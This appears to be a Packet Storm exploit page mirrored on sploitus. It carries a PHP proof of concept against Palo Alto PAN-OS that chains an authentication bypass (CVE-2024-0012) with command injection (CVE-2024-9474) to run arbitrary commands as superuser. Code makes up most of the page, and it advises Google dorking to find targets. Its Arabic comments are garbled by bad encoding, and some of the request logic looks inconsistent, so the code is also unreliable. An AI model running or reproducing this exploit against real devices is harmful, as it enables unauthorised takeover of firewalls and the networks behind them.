Share
## https://sploitus.com/exploit?id=PACKETSTORM:215255
=============================================================================================================================================
    | # Title     : Palo Alto Networks PAN-OS 11.2 PHP Code Injection Vulnerability                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://paloaltonetworks.com                                                                                                |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Bypasses authentication using CVE-2024-0012.
    
        Exploits command execution vulnerability CVE-2024-9474.
    
        Uses an administrator session to run any commands on the system.
    
        Supports execution of any command on the system, such as loading a shell.
    	
    	( https://packetstorm.news/files/id/182665/ -	CVE-2024-24809, CVE-2024-5910 )
     
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php 
    
    [+] SeT target  = Line : 77
    
    [+] PayLoad :
    
    <?php
    
    function sendRequest($url, $data = null, $headers = [], $method = 'GET', $cookies = []) {
        $ch = curl_init();
        
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    
        if (!empty($headers)) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        }
    
        if (!empty($cookies)) {
            curl_setopt($ch, CURLOPT_COOKIE, implode("; ", $cookies));
        }
    
        if ($method == 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        return $response;
    }
    
    // ๐Ÿ“Œ ุชุฌุงูˆุฒ ุงู„ู…ุตุงุฏู‚ุฉ ูˆุงู„ุญุตูˆู„ ุนู„ู‰ ุฌู„ุณุฉ ู…ุณุคูˆู„
    function bypassAuth($target) {
        $auth_url = "$target/php/utils/createRemoteAppwebSession.php?" . bin2hex(random_bytes(4)) . ".js.map";
        
        $postData = [
            'user' => '`whoami`', // ูŠู…ูƒู† ุชุบูŠูŠุฑู‡ ุฅู„ู‰ `cmd.exe /c whoami` ููŠ ูˆูŠู†ุฏูˆุฒ
            'userRole' => 'superuser',
            'remoteHost' => '',
            'vsys' => 'vsys1'
        ];
    
        $headers = [
            "X-PAN-AUTHCHECK: off"
        ];
    
        $response = sendRequest($auth_url, http_build_query($postData), $headers, 'POST');
    
        if (strpos($response, "PHPSESSID") !== false) {
            preg_match('/PHPSESSID=([^;]+)/', $response, $matches);
            return $matches[1] ?? null;
        }
    
        return null;
    }
    
    // ๐Ÿ“Œ ุงุณุชุบู„ุงู„ ุชู†ููŠุฐ ุงู„ุฃูˆุงู…ุฑ ุนุจุฑ ุงู„ุฌู„ุณุฉ ุงู„ู…ุตุงุฏู‚ ุนู„ูŠู‡ุง
    function executeCommand($target, $session, $cmd) {
        $exploit_url = "$target/index.php/.js.map";
    
        $cookies = ["PHPSESSID=$session"];
    
        // ุชุนุฏูŠู„ ุงู„ุฃูˆุงู…ุฑ ุจู†ุงุกู‹ ุนู„ู‰ ุงู„ู†ุธุงู…
        if (stripos(PHP_OS, 'WIN') !== false) {
            $cmd = "cmd.exe /c " . $cmd; // ุฅุฐุง ูƒุงู† ูˆูŠู†ุฏูˆุฒุŒ ุงุณุชุนู…ู„ cmd.exe
        }
    
        $postData = [
            'user' => "`$cmd`",
            'userRole' => 'superuser',
            'remoteHost' => '',
            'vsys' => 'vsys1'
        ];
    
        sendRequest($exploit_url, $postData, [], 'GET', $cookies);
    }
    
    // ๐Ÿ“Œ ุชุดุบูŠู„ ุงู„ุงุณุชุบู„ุงู„
    $target = "http://127.0.0.1"; // ๐Ÿ”ฅ ุนุฏู„ ุงู„ู‡ุฏู ู‡ู†ุง
    
    echo "[+] ุชุฌุงูˆุฒ ุงู„ู…ุตุงุฏู‚ุฉ...\n";
    $session = bypassAuth($target);
    
    if ($session) {
        echo "[+] ุชู… ุงู„ุญุตูˆู„ ุนู„ู‰ ุงู„ุฌู„ุณุฉ: $session\n";
    
        if (stripos(PHP_OS, 'WIN') !== false) {
            echo "[+] ุชุดุบูŠู„ ุฃู…ุฑ Windows: whoami\n";
            executeCommand($target, $session, "whoami");
        } else {
            echo "[+] ุชุดุบูŠู„ ุฃู…ุฑ Linux: whoami\n";
            executeCommand($target, $session, "whoami");
        }
    
    } else {
        echo "[-] ูุดู„ ุชุฌุงูˆุฒ ุงู„ู…ุตุงุฏู‚ุฉ!\n";
    }
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================